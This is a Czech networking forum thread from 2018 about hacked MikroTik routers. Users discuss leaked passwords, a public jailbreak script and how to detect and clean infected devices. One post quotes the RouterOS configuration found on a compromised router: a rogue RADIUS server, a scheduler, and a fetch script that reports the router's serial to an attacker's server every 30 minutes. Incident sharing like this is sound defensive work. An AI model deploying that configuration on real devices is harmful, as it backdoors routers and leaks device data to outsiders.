MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

[honzam]

devel mode

Jak jsi na ten mod přišel? Nikdy jsem nic takového nikde nečetl. Pokud něco takového existuje tak by to bylo zajímavé...

[mpcz]

OK, sorry, nějak z toho jasně nevidím, kdo, kdy a proč ten backup vytvořil. mpcz, 8.jun.2018

[mpcz]

kristalovou kouli nemam ale
skript z https://github.com/0ki/mikrotik-tools/b ... it_full.sh se pokousi vyrobit backup file na MT presne v tom formatu jako ho vidim v Tvem screenshotu:
"jb_$$_$RANDOM.backup"

Takze je IMHO dost jiste, ze heslo k MT je prozrazene (ten skript ho musi znat). Bud ho uhodli nebo ziskali z napadnutelne verze ROSu

edit: teoreticky by nyni (pokud byl instalovan ten jail break exploit) ted ten mikrotik na telnet mohl umoznit prihlaseni do devel modu (user:devel, heslo od admina) - videl bys shell z linuxu ne Mikrotik CLI

Jsa úplný Linux laik, tak po delším boji s Linuxem potvrzuji vše, co je zde napsáno. Funguje to. Rýpání do Linuxu nechám odborníkům. mpcz, 10.jun.2018

[okoun]

Dík, zdá se, že na tom něco bude. Sice tomu dopodrobna nerozumím, možná by to chtělo více rozpitvat, ale čemu už vůbec nerozumím, je to, že Sergej mi napsal, že ten soubor vznikl přirozenou cestou. Moc jsem tomu nevěřil a teď o to míň. Dalo by se to více ozřejmit, pro ty méně chápavé, co ten skript dělá? A třeba i popis celého předpokládaného děje od počátku i když je to zatím pouze teorie? A proč tam vůbec ten backup útočník potřebuje? Cca 3 dni před tím incidentem tam byla verze 6.42.1 a změněno heslo, které nikde jinde nebylo. Že by ho uhodl, tomu moc nevěřím. Dík. mpcz, 8.jun.2018

ted se mi na dvou CPE s verzí 6.42.1 také změnil hesl, CPE měly veřejky, tak nevím co je zle?

[mpcz]

A jaké bylo učiněno doplňové opatření kromě poslední verze a změny hesla? A bylo stejné heslo i někde jinde? To považuji za slabinu systému, protože společné heslo je spíše pravidlem, než vyjímkou. Pokusím se zjistit, jaké je heslo do zamklých strojů, mohlo by být společné nebo z něčeho generovatelné, čemuž ale moc nevěřím. mpcz, 15.jun.2018

[Myghael]

A máme to tu zase... Kromě klasiky (změny DNS) to dělá i jiné skopičiny:

Kód: Vybrat vše

/system identity
set name=test
/ip pool
add name=pool1 ranges=10.1.1.2-10.1.1.250
/ppp profile
add change-tcp-mss=yes dns-server=8.8.8.8 local-address=10.1.1.1 name=test remote-address=pool1 use-encryption=yes
/radius
add address=47.75.230.175 secret=test service=ppp
add address=47.75.230.175 secret=test service=ppp
/system scheduler
add interval=30m name=a on-event=ip policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-time=startup
/system script
add name=ip owner=admin policy=reboot,read,write,policy,test,password,sniff,sensitive source=\
    "{/tool fetch url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=XXXXXXXXXX&action=upload&sncode=YYYYYYYY&dynamic=static\")}"


Na přístup si to vytváří nového uživatele ("Admin" - opravdu s velkým A) v systému a radius. V tom skriptu je XXXXXXX nějaký kód zatím v každém RB unikátní, totéž YYYYYYYY, jehož součástí je i sériové číslo routerboardu. Na některých byla vytvořená i nějaká maškaráda v NAT. Výše uvedený výpis pochází z napadeného zařízení, které běží na ROS i firmware 6.42.3 a kterému bylo jméno i heslo pro přístup změněno před několika málo dny.

Už se to řeší i na fóru MikroTiku:
https://forum.mikrotik.com/viewtopic.php?t=135762
https://forum.mikrotik.com/viewtopic.php?f=2&t=135774

Setkal se s tím už někdo zdejší?

[Dalibor Toman]

jenze stale plati, ze nikdo neni schopen prokazat, ze slo o skutecny hack. Jak pise strods - vsechny nahlasene 'hacky' verzi ROSu s opravenymi bezp. chybami se daji pripsat moznosti, ze byly hacknuty s pouzitim drive ziskaneho hesla...

[ludvik]

Proč tajíš ty kódy? Třeba by někoho mohlo zajímat, co to stahuje.

[Dalibor Toman]

Proč tajíš ty kódy? Třeba by někoho mohlo zajímat, co to stahuje.

nasel jsem jednoho napadeneho MT (zakaznikova wifina), ktery se bavi s tim serverem a pri pokusu o stazeni wgetem je videt, ze server vraci jen text "ok". Kdyz jsem zmenil cisl v parametru key pak odpovedel "no".

Cili to nic nestahuje ale jen informuje centralu

[ludvik]

Už jsem to také zkusil
Blbé je, že to je nějaký cloud a netroufnu si to prostě po ip seknout ... jen tak pro jistotu.

[Myghael]

Tak tak, je to hostované v AliCloudu, tedy čínské obdobě AWS. Doména je registrovaná na čínskou firmu, takže asi tak...

[pngi]

Tak my taky, viz. odkaz https://drive.google.com/open?id=1_BryqILt4w23kbQml4lWt-VJAWxV3NqP. Mikrotik byl ještě před napadením na nejnovější verzi 6.42.4. Nejhorší věc je, že se mi zdá, že se to rozlezlo do téměř celé sítě. Mám plno klientů, kteří si stěžují na pomalé načítání stránek (ostatní věci jako IPTV, různé aplikace atp. fungujou ok).

Co byste dělali vy? Jde nějak ten sráč odhalit, aniž bych musel prolézt každé zařízení? Na napadených zařízeních dělám netinstall a měním heslo...

[hapi]

dost zajímavý, dostal sem se do jednoho routeru kde něco vytvořilo address list s acceptem a v něm byly všechny subnety z routovací tabulky a ostatní drop. Bylo tam 5 filtrů a u každýho komentář a tim že mám upgradovat atd.. a btc peněženkou. Nicméně routeru nic není a nic jinýho zdá se změněno nebylo, žádnej fetch, žádná změna hesla, žádný nový user.

[dantasik]

Je to zas další berlička, ale trochu pomuze pouziti blacklistu na hlavni gw:

​https://blog.squidblacklist.org/?p=1658


Ty IP se tam daji i dohledat ze kterých to předtím chodilo.
Je tam aspoň sance ze se něco zastavi...

[Kaja]

Otazka na Ty z Vas, kteri neco nasli.
Fetch je vzdy na toto FQN (www.boss-ip.com/Core/Update.ashx\........) nebo i nekam jinam?
Pokud stale na stejne FQN, nechala by se na zaklade toho udelat detekce napadeni (staci na vasem nameserveru, pokud veskery UDP/53 provoz smerujete na vlastni DNS, logovat IP, ktere se snazi o preklad tohoto FQN).

JK